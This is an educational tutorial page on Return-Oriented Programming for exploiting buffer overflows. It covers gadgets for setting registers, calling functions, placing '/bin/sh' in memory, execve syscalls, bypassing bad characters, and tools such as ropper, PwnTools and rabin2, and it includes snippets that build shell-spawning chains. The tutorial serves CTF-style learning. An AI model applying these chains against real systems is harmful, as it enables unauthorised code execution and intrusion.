Return-Oriented Programming (ROP)

Return-Oriented Programming is a common technique for exploiting buffer overflows by executing gadgets to do what you want

The idea of ROP is pretty simple. With a buffer overflow, you can control the Instruction Pointer by overflowing the stack where it is stored, and then on a future return (ret) instruction it will pop that overwritten value from the stack and jump to it.

The trick is that, if we put multiple jump locations on the stack, we can keep returning to different tiny pieces of code. Each time, executing a few instructions we want before the next ret to keep the chain going. We can use ROP "gadgets" which are helpful pieces of code that help achieve greater things, like getting a shell by executing /bin/sh.

The concept is explained in more detail in LiveOverflow's Return-Orientred Programming tutorial.

Common idea's

A few common things that you'll encounter while creating your ROP chain.

Getting values into registers

Since you control the stack, the easiest way to get a value into a register is by poping that value from the stack into that register. If you need 1337 in register $rdi for example, you could simply find a pop rdi; ret gadget and then append the 1337 value to your payload, which will pop it from the stack. For example:

POP_RDI_GADGET = ...  # Find address using $ ropper -f ./binary --search 'pop rdi'

payload = flat({
    OFFSET: [
        POP_RDI_GADGET,  # pop rdi; ret
        1337,  # Value to be popped
        ...  # Rest of your chain now that $rdi = 1337
    ]
})

If you have a simple ROP you can also let PwnTools find this gadget for you:

rop = ROP(elf)  # Find ROP gadgets
rop(rdi=1337)  # Use any gadget to set $rdi = 1337
...

payload = flat({
    OFFSET: rop.chain()  # Create the chain of `ret`urns and `pop`s
})

If there aren't simple pop gadgets for the registers you need, you can also be creative with gadgets like add, sub, xor, etc. manually. An xor ecx, ecx; ret gadget for example would set ecx to 0. And using the arithmetic operators you can alter the value from what it was, to the value you want by adding the difference for example.

rax is the return value

One more useful trick for controlling the rax register specifically is the fact that it contains the return value of the last function call. The read() function for example returns the length of the input that was read. Or some calculating function that returns a value. This fact can be useful in choosing which syscall to execute, like execve('/bin/sh').

Getting lucky

The easiest way to get a value into a register is if that value is already in that register at the time of your ROP chain. Always check with a debug breakpoint what the registers are set to when your ROP chain executes, to see if you already have some usable values

Calling functions

When you call a function from code, a few things happen in assembly. First, registers are set to their values as arguments to the function you are calling. Then, the program simply jumps to the address of the function which will take the values from the registers you set. Different architectures have different call conventions:

If these registers are set to the values you want as arguments, you can just jump to the function you wish to call and those will be the arguments. If you for example wanted to call call_me(1337) on x64, you would need the following assembly:

mov rdi, 1337   ; Prepare the ARG0 value for x64
jmp call_me     ; Jump straight to the function (in ROP you would `ret` to pop 
                ;                           the top stack value and jump to it)

Since we are using a jmp here instead of a clean call, sometimes the stack will get misaligned on 64-bit. When you notice that your exploit should work, but it segfaults during some calls and returns inside of the target function you might want to jump to an empty ret instruction to align the stack again. In PwnTools you can easily do this like so right before your call:

rop.raw(rop.ret)

Getting strings into registers

Many functions need strings as arguments, like the system() function or the execve() syscall, which both need "/bin/sh" as the first argument in order to spawn a shell. Strings are not passed by value, but passed by reference. This means we actually need to provide a pointer the the string as the argument, which needs to be somewhere in memory.

  1. We need to get the string into memory

  2. We need to know its location

There are a few ways to do it, but not a one-size-fits-all solution. It all depends on what is available in the binary.

Already stored in memory

If you're lucky, the string might already be stored in the binary. In libc for example, there exists a "/bin/sh" string that is often used for ret2libc. But you might need other strings that can be found in the binary.

Searching for the offsets for such strings is easy using the grep command in GDB GEF while running the binary:

gef➤  grep /bin/sh
[+] Searching '/bin/sh' in memory
[+] In '/usr/lib/x86_64-linux-gnu/libc.so.6'(0x7ffff7f42000-0x7ffff7f95000), permission=r--
  0x7ffff7f5d031 - 0x7ffff7f5d038     "/bin/sh"

If your target system has ASLR enabled, some locations like the libc library will be offset by a random value. So to use these you would first need to leak the library address and then use relative values to use your string again. But some addresses like the .data section are not randomized, even when ASLR is enabled. So if your desired string is stored in such a section you can always use it.

From the stack

In a buffer overflow attack, you overflow the stack with your own values to control return addresses, and maybe pop values into registers. But you may also be able to use this space to write your required strings into, and then just provide an address to the stack where your string is stored. This string can then be part of your payload, and so will reference itself.

You can easily get the location of your string on the stack by running the program and inputting your desired string into the payload, and then using the GDB GEF grep function from above to find where it is stored. This will then give you a location on the stack and you can then reference that location to get a pointer to any string in your payload.

Note that with ASLR, the stack address is randomized. This means that if ASLR is enabled, you will need to first leak a stack address and then use relative offsets from there to find your payload again.

Arbitrary write

Another method is to use an arbitrary write if you have one. Using ROP, or format string exploits you might be able to write data to memory. You can then slowly build out the string you require and then use the address to that location.

Often you can find some static read/write section where data may be written, without corrupting the program. All these sections and their addresses can be found using many tools, such as rabin2 from radare2:

$ rabin2 -S ./binary
nth paddr        size vaddr       vsize perm name
―――――――――――――――――――――――――――――――――――――――――――――――――
...
23  0x00001050   0x22 0x00601050   0x22 -rw- .data
24  0x00001072    0x0 0x00601078   0x10 -rw- .bss
...

When searching for ROP gadgets to achieve this, you can use mov instructions that look like:

$ ropper -f write4 --search mov
...
0x0000000000400628: mov qword ptr [r14], r15; ret;

If you control both registers, you can write any value into any address, as an "arbitrary write". There are many different ways to achieve this and you can be creative with it. Then just write a few addresses after each other to form a full string.

execve('/bin/sh')

execve() is a syscall, an instruction that only the kernel can execute. A program must use such a syscall to elevate its privileges from user mode temporarily and be able to execute these special instructions. There are two ways of doing this:

syscall

This instruction is exclusive to 64-bit and will use the $rax register to decide which syscall to execute. A table of all x64 syscalls with their arguments can be found here:

There we can find execve() as number 59 or 0x3B, and also what its arguments mean:

execve(char *filename = rdi, char *const *argv = rsi, char *const *envp = rdx)

In assembly, the following values should be set:

mov rax, 0x3b         ; set rax to the syscall number for execve()
mov rdi, filename     ; set rdi to the address of the filename string
mov rsi, argv         ; set rsi to the address of the argument values array
mov rdx, envp         ; set rdx to the address of the environment variables array
syscall               ; invoke the syscall

Often we don't care about arguments, because we can just run /bin/sh without any. Then these extra $rsi and $rdx registers should be set to 0.

int 0x80

On 32-bit architechture, the syscall instruction does not exist. During this time, a kernel call was done by issuing an interrupt. With interrup 0x80 you can invoke a syscall just like we did on 64-bit. In some cases the compiler will still generate an int 0x80 instruction even on 64-bit architecture so it should always be worth looking for regardless of architecture.

The list of syscalls 32-bit are a bit different and can be found here:

There we can find execve() as number 11 or 0x0B, and its arguments are the same as for syscall above. In assembly you sould set the values like this (note the different registers):

mov eax, 0x0b         ; set rax to the syscall number for execve()
mov ebx, filename     ; set ebx to the address of the filename string
mov ecx, argv         ; set rsi to the address of the argument values array
mov edx, envp         ; set rdx to the address of the environment variables array
int 0x80              ; invoke the syscall

SROP

pageSigReturn-Oriented Programming (SROP)

Bypassing badchars

"badchars" is the name for characters that the application does not allow. This may be newlines (\x0A), where it would send your payload before being done. Or null bytes (\x00) where it would terminate your string before being done. In some specific cases, this is more restricted, and you might need to pull out tricks to not use those banned characters.

If you are trying to inject "/bin/sh" in your payload for example, but the / slash is banned, then you can try to do it in more steps. If you first write ".cho.ri", without any / slash character, you can then later XOR the values with \x01 to get back the original /bin/sh string. This will require any XOR gadget in the binary or any other similar instruction that allows you to alter the bytes of your payload. Some common ones are:

  • xor: XOR and store in the first argument

  • add: Add both together and store in the first argument

  • sub: Subtract second from first, and store in first

These allow you to change the initial string you send in the payload, and then dynamically change it after it is stored in memory on the target.

Ropper

Ropper is a colorful CLI tool that can automatically find ROP gadgets (meaning small pieces of code before returns) for you that will be useful in creating a full chain. It will print all sorts of gadgets with the idea being that you search for what you need in the output. For example, if we want to find xor instructions:

$ ropper -f ./binary --search 'xor'
[INFO] Searching for gadgets: xor

[INFO] File: ./badchars
0x0000000000400628: xor byte ptr [r15], r14b; ret;
0x0000000000400629: xor byte ptr [rdi], dh; ret;

To get a more flexible output, you can also just use grep on the tool's output with what we want:

$ ropper -f ./binary | grep rdi
0x000000000040062d: add byte ptr [rdi], dh; ret;
0x00000000004006a3: pop rdi; ret;
0x0000000000400631: sub byte ptr [rdi], dh; ret;
0x0000000000400629: xor byte ptr [rdi], dh; ret;

ropper may find different gadgets than ROPgadget, which is a similar tool that also finds gadgets, but may find different specific ones that are more useful:

$ ROPgadget --binary binary | grep rdi
0x000000000040062d : add byte ptr [rdi], dh ; ret
0x00000000004006a3 : pop rdi ; ret
0x0000000000400631 : sub byte ptr [rdi], dh ; ret
0x0000000000400629 : xor byte ptr [rdi], dh ; ret

Ropper can even try to find a full chain for you. One example is the execve('/bin/sh', 0, 0) syscall, which can be automatically generated if everything required exists (note that it generated Python2 code):

$ ropper -f /bin/bash --chain execve
...
[INFO] generating rop chain
...
rop += rebase_0(0x0000000000030a9f) # 0x0000000000030a9f: pop r12; ret;
rop += '//bin/sh'
rop += rebase_0(0x0000000000030503) # 0x0000000000030503: pop rbp; ret;
rop += rebase_0(0x0000000000119000)
rop += rebase_0(0x0000000000080ea9) # 0x0000000000080ea9: mov qword ptr [rbp], r12; pop rbx; xor eax, eax; pop rbp; pop r12; ret;
...
rop += rebase_0(0x0000000000030392) # 0x0000000000030392: syscall;
print rop
[INFO] rop chain generated!

PwnTools

I highly recommend using as much PwnTools magic as you can. It can significantly simplify your payload, and using print(rop.dump()) you can still understand what it is trying to do to debug. Many times things like settings registers or calling functions are tedious, but with ROP it's a breeze.

For more general PwnTools syntax, see Useful syntax For more ROP specific syntax, see the documentation.

elf = ELF("./binary")

# Basics
rop = ROP(elf)
rop.call(0x401337)  # Jump to specific address
rop.call("name")  # Jump to function "name()"
rop.raw(b"\x00"*8)  # Add raw data to the ROP chain

# Automagic
rop.callme(1337)  # Call callme() function in the binary with 1337 argument
rop.call(rop.ret)  # Find and call a `ret` (return) instruction (useful for aligning the stack)
rop(rax=0xdead, rdi=0xbeef, rsi=0xcafe)  # Set registers
bin_sh = next(elf.search(b"/bin/sh\x00"))  # Search for string (returns address)

# Chain the payload into one
rop.chain()
# Dump details about the chain
print(rop.dump())

rabin2

rabin2 from radare2 is a CLI tool that can analyze a binary for you. It has a lot of different options for useful information while planning your ROP exploits.

$ rabin2 [OPTIONS...] ./binary
  • -i: Show functions

  • -z: Show strings in .data section

  • -s: Show all symbols

  • -S: Show sections (with addresses)

Last updated